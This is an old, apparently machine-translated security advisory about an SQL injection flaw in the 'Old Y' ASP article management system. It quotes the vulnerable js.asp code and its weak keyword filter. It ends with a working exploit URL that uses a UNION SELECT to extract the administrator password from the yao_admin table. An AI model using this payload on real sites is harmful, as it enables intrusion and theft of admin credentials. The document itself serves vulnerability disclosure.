Old Y article management system of the injection 0day-vulnerability warning-the black bar safety net

2009-06-24T00:00:00
ID MYHACK58:62200923650
Type myhack58
Reporter 佚名
Modified 2009-06-24T00:00:00

Description

Magic springs[B. S. N.] hacking Defense

Vulnerability rating: moderate Vulnerability description:

The vulnerability appears in the js. asp, we first look at the source code.

Code:

If CheckStr(Request("ClassNo")) <> "" then ClassNo = split(CheckStr(Request("ClassNo")),"|") 'Here is to get the variable using checkstr filter, but the feeling didn't play a role. Then divided into an array on error resume next NClassID = LaoYRequest(ClassNo(0)) NClassID1 = LaoYRequest(ClassNo(1)) 'Get the array 1 with array 2 shaping filter. Here there is no vulnerability End if

num = LaoYRequest(request. querystring("num"))'where num must be>=1 ....... set rs=server. createObject("Adodb. recordset") sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

If NclassID<>"" and NclassID1="" then If Yao_MyID(NclassID)="0" then SQL=SQL&" and ClassID="&NclassID&"" else MyID = Replace(""&amp; Yao_MyID(NclassID)&"","|",",") SQL=SQL&" and ClassID in ("&MyID&")" End if elseif NclassID<>"" and NclassID1<>"" then MyID = Replace(""&Request("ClassNo")&"","|",",") SQL=SQL&" and ClassID in ("&MyID&")" 'Here appears the problem of classno and didn't do other filtering is written to the query End if

select case topType case "new" sql=sql&" order by DateAndTime desc,ID desc" case "hot" sql=sql&" order by hits desc,ID desc" case "IsHot" sql=sql&" and IsHot = 1 order by ID desc" end select

set rs = conn. execute(sql) if rs. bof and rs. eof then str=str+"does not meet the conditions of Article" ........

-------------------------------

function. asp

Code: function CheckStr(str) CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(1 3),"")," ","") CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","") CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(3 4),"") CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","") end function

Use code: js. asp? num=1&ClassNo=1/1/1[SQL] js. asp? num=1&ClassNo=1/1/1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1####Get a password code